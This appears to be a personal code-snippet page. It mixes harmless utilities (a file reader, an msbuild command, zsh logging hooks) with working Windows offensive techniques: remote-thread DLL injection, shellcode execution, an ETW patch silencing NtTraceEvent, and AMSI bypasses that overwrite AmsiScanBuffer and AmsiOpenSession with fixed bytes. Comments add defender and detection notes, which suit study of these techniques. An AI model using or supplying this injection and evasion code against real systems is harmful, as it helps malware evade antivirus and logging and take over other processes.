Code snippets

Table of contents

C printf DEBUG macro

#define DEBUG(x, ...) printf(x, ##__VA_ARGS__)

Read a whole file into memory

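/*
 * Read the whole of `filename` into a freshly malloc'ed, NUL-terminated buffer
 * and hand it back through `*string`. The caller owns the buffer and must
 * free() it.
 *
 * On any failure (cannot open, not seekable, allocation failure, short read) a
 * message is printed, `*string` is set to NULL and nothing is leaked.
 *
 * Caveats: the size comes from fseek/ftell, which is only meaningful for
 * regular files (pipes, sockets and device nodes report 0 or -1); the path is
 * used exactly as given, so a caller that takes it from untrusted input is
 * responsible for validating it.
 */
void readFile(const char* filename, char** string) {
    *string = NULL;

    FILE* f = fopen(filename, "rb");
    if (!f) {
        printf("Cannot open the file\n");
        return;
    }

    /* ftell() returns -1L on error, so keep it as a signed long until checked. */
    long fsize = -1L;
    if (fseek(f, 0, SEEK_END) == 0) {
        fsize = ftell(f);
    }
    if (fsize < 0 || fseek(f, 0, SEEK_SET) != 0) {
        printf("Cannot determine the file size\n");
        fclose(f);
        return;
    }

    /* +1 for the terminating NUL; this also handles an empty file. */
    char* buf = (char*)malloc((size_t)fsize + 1);
    if (!buf) {
        printf("Cannot allocate string buffer\n");
        fclose(f);
        return;
    }

    /* Element size 1 so the return value is the number of bytes actually read. */
    size_t got = fread(buf, 1, (size_t)fsize, f);
    fclose(f);
    if (got != (size_t)fsize) {
        printf("Cannot read the whole file\n");
        free(buf);
        return;
    }

    buf[got] = '\0';
    *string = buf;
}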

NtCurrentProcess

/* Pseudo-handle for the calling process: the same value GetCurrentProcess()
 * returns (-1 widened through LONG_PTR and cast to HANDLE). It refers to the
 * current process only and does not need (or accept) CloseHandle. */
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )

Typedef NTDLL functions

/* Function-pointer type matching ntdll!NtSetInformationProcess, presumably so
 * the export can be resolved at runtime (GetProcAddress) rather than linked;
 * the parameter list mirrors the native prototype. */
typedef NTSTATUS(NTAPI *pNtSetInformationProcess)(
    HANDLE ProcessHandle,
    PROCESS_INFORMATION_CLASS ProcessInformationClass,
    PVOID ProcessInformation,
    ULONG ProcessInformationLength
    );

Inject a DLL into a process

#include <windows.h>
#include <stdio.h>

// Classic CreateRemoteThread DLL injection: copies the DLL path into the target
// process and starts a remote thread at kernel32!LoadLibraryA with that buffer
// as its argument, so the target loads the DLL itself. Returns TRUE once the
// remote thread exists (not once the DLL has actually loaded); the wait below
// is capped at one second.
//
// This OpenProcess / VirtualAllocEx / WriteProcessMemory / CreateRemoteThread
// chain is among the most heavily signatured sequences in Windows telemetry:
// cross-process memory writes and remote thread creation (Sysmon event ID 8,
// EDR kernel callbacks) are the usual detection points.
//
// As written, the OpenProcess result is used without a NULL check (the
// following allocation should then fail and FALSE is returned), and neither
// processHandle nor dllThread is ever closed.
BOOL injectDLL(char *moduleToInject, DWORD processPID) {
    // open the target process with full rights
    HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, processPID);

    // allocate a committed, writable region in the target for the DLL path
    void* remoteBuffer = VirtualAllocEx(processHandle, NULL, strlen(moduleToInject) * sizeof(char), MEM_COMMIT, PAGE_READWRITE);
    if (!remoteBuffer) {
        return FALSE;
    }

    // copy the DLL path into that region
    BOOL status = WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)moduleToInject, strlen(moduleToInject) * sizeof(char), NULL);
    if (!status) {
        return FALSE;
    }

    // resolve kernel32!LoadLibraryA (ANSI variant, matching the char* path);
    // kernel32 is mapped at the same base in every process, so the local
    // address is valid in the target
    HMODULE kernel32 = GetModuleHandleA("Kernel32.dll");
    if (!kernel32) {
        return FALSE;
    }
    PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(kernel32, "LoadLibraryA");
    if (!threadRoutine) {
        return FALSE;
    }
    // start LoadLibraryA in the target with the remote buffer as its argument
    HANDLE dllThread = CreateRemoteThread(processHandle, NULL, 0, threadRoutine, remoteBuffer, 0, NULL);
    if (!dllThread) {
        return FALSE;
    }
    // give the loader up to 1 s; the result of the wait is not inspected
    WaitForSingleObject(dllThread, 1000);
    return TRUE;
}

Run shellcode

// Casts an address to a no-argument function pointer and calls it, i.e.
// transfers control to whatever bytes sit at entrypointAddress. The page must
// already be executable; a control transfer into non-image RX/RWX memory like
// this is a standard heuristic for shellcode execution in memory scanners.
((void(*)())entrypointAddress)();

Patch ETW

// Disables ETW event reporting from the current process by overwriting the
// byte at ntdll!NtTraceEvent+3 with 0xC3 (x86/x64 `ret`) after temporarily
// making that byte PAGE_EXECUTE_READWRITE; only one byte of retPatch is copied
// (length 1) and the previous protection is restored afterwards. Return
// values of GetProcAddress/VirtualProtect are not checked.
//
// Defender notes: the patched byte stays in the mapped ntdll image, so
// comparing the process's ntdll .text against the on-disk copy, or alerting on
// VirtualProtect calls that make image pages writable, exposes this.
void patchETW(){
    Pvoid NtTraceEvent = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtTraceEvent");
    DWORD dwOld;
    DWORD retPatch = 0xc3;   // 4-byte value; only its first byte is written below
    VirtualProtect((DWORD64)NtTraceEvent + 3, 1, PAGE_EXECUTE_READWRITE, &dwOld);
    CopyMemory((DWORD64)NtTraceEvent + 3, &retPatch, 1);
    VirtualProtect((DWORD64)NtTraceEvent + 3, 1, dwOld, &dwOld);
}

Patch AMSI

// Overwrites the first bytes of amsi!AmsiScanBuffer in process hProc with a
// fixed 13-byte sequence ending in 0xC3 (`ret`). The region is first made
// PAGE_READWRITE (0x04) for 0x1000 bytes via NtProtectVirtualMemory, the bytes
// are written with NtWriteVirtualMemory, and the previous protection is put
// back. None of the NTSTATUS results are checked.
//
// Notes: `OUT` is misleading, hProc is only read. The AmsiScanBuffer address
// is resolved in *this* process (LoadLibraryA/GetProcAddress locally) and
// then used in hProc, which presumably relies on amsi.dll sharing its base
// address across processes. amsiAddr_bk is a separate copy, presumably
// because NtProtectVirtualMemory updates the base/size arguments in place.
//
// Defender notes: an amsi.dll .text integrity check, or telemetry on
// NtProtectVirtualMemory / NtWriteVirtualMemory targeting amsi.dll pages,
// catches this.
void patchAMSI(OUT HANDLE& hProc) {

    void* amsiAddr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiScanBuffer");

    char amsiPatch[] = { 0x31, 0xC0, 0x05, 0x4E, 0xFE, 0xFD, 0x7D, 0x05, 0x09, 0x02, 0x09, 0x02, 0xC3 };

    DWORD lpflOldProtect = 0;
    unsigned __int64 memPage = 0x1000;   // one page; may be rounded by the call
    void* amsiAddr_bk = amsiAddr;         // copy handed to NtProtectVirtualMemory


    NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
    NtWriteVirtualMemory(hProc, (LPVOID)amsiAddr, (PVOID)amsiPatch, sizeof(amsiPatch), (SIZE_T*)nullptr);
    NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
}
// Same mechanism as patchAMSI, but targets amsi!AmsiOpenSession and writes a
// 3-byte sequence. The region is made PAGE_READWRITE (0x04) for 0x1000 bytes,
// the bytes are written with NtWriteVirtualMemory, and the old protection is
// restored; no NTSTATUS is checked.
//
// `OUT` is misleading, hProc is only read. The address is resolved in this
// process and used in hProc, which presumably relies on amsi.dll having the
// same base in both. Detection surface is the same as for patchAMSI:
// amsi.dll code-page integrity and protection-change telemetry.
void patchAMSIOpenSession(OUT HANDLE& hProc) {

    void* amsiAddr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiOpenSession");

    char amsiPatch[] = { 0x48, 0x31, 0xC0 };

    DWORD lpflOldProtect = 0;
    unsigned __int64 memPage = 0x1000;   // one page; may be rounded by the call
    void* amsiAddr_bk = amsiAddr;         // copy handed to NtProtectVirtualMemory

    NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
    NtWriteVirtualMemory(hProc, (LPVOID)amsiAddr, (PVOID)amsiPatch, sizeof(amsiPatch), (SIZE_T*)nullptr);
    NtProtectVirtualMemory(hProc, (PVOID*)&amsiAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
}

Get a process handle by name

C

#include <TlHelp32.h>

// Walks a Toolhelp32 process snapshot for an entry whose image name equals
// procName (wcscmp: exact, case-sensitive, so this assumes a UNICODE build
// where szExeFile is a WCHAR array), stores its PID through *PID and returns
// a PROCESS_ALL_ACCESS handle to it. Returns NULL when no matching process
// could be opened.
//
// As written: the inner `HANDLE hProc` shadows the outer one (which stays 0),
// `status` is unused, the snapshot handle is neither checked against
// INVALID_HANDLE_VALUE nor closed, and *PID has already been overwritten by
// the time OpenProcess fails for that entry.
HANDLE getProcHandlebyName(LPCWCHAR procName, DWORD* PID) {
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);   // required before Process32First
    NTSTATUS status = NULL;
    HANDLE hProc = 0;

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (Process32First(snapshot, &entry)) {
        do {
            if (wcscmp((entry.szExeFile), procName) == 0) {
                *PID = entry.th32ProcessID;
                HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *PID);

                // could not open this one (e.g. access denied); try the next
                // process with the same name
                if (!hProc) {
                    continue;
                }
                return hProc;
            }
        } while (Process32Next(snapshot, &entry));
    }

    return NULL;
}

VBA

' Toolhelp32 imports used by PIDByProcName. PtrSafe marks the declarations as
' reviewed for 64-bit Office; the snapshot handle is declared as Long here.
' Process32First/Next fill the passed PROCESSENTRY32 (dwSize must be set first).
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, PE32 As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, PE32 As PROCESSENTRY32) As Long


' Returns the PID of the first running process whose image name contains
' ProcName (InStr with vbBinaryCompare: case-sensitive substring match, so
' "cmd" also matches "cmdagent.exe"), or 0 when nothing matches or the
' snapshot cannot be created.
'
' Caveats: the return type is Integer, so a PID above 32767 overflows
' (th32ProcessID is a Long); the local PID variable is never used; and the
' snapshot handle is closed only on the not-found path, since Exit Function
' skips CloseHandle.
Private Function PIDByProcName(ProcName As String) As Integer
    Dim PE32 As PROCESSENTRY32
    Dim Proc_Name As String
    Dim hSnapshot As Long
    Dim lRet As Long
    Dim PID As Integer

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)

    If hSnapshot <> INVALID_HANDLE_VALUE Then
        PE32.dwSize = Len(PE32)   ' Toolhelp requires dwSize before the first call
        lRet = Process32First(hSnapshot, PE32)

        Do While lRet
            Dim comp As Integer
            comp = InStr(1, PE32.szExeFile, ProcName, vbBinaryCompare)
            If comp > 0 Then
                PIDByProcName = PE32.th32ProcessID
                Exit Function   ' returns without closing hSnapshot
            End If

            lRet = Process32Next(hSnapshot, PE32)
        Loop
        CloseHandle hSnapshot
    End If
End Function

Build an MSBuild project from the command line

# Release build of the project/solution found in the current directory:
# the Clean target runs first, then Build.
msbuild -p:Configuration=Release -t:Clean,Build

Auto timeline

Add to .zshrc

# zsh hook, run just before each command line executes: prints a timestamp so
# that the session transcript records when every command was issued.
preexec() {
    echo ">> Date : $(date +%d.%m.%y-%H:%M:%S)\n"
}

Add to .zshenv

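# Record every top-level terminal session with script(1) into ~/.script.
# Only the outermost shell (SHLVL 1) starts a recording: script itself spawns
# a child shell at SHLVL 2, so the guard stops recursive recording.
# The log directory is created owner-only (0700) because a transcript holds
# everything typed and printed in the session; without the mkdir, script
# simply fails when the directory does not exist yet.
if [[ ${SHLVL} -eq 1 ]]; then
    mkdir -p -m 700 ~/.script
    script ~/.script/"$(date +%d.%m.%y-%H:%M:%S)-$((1 + RANDOM % 1000))"
fi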
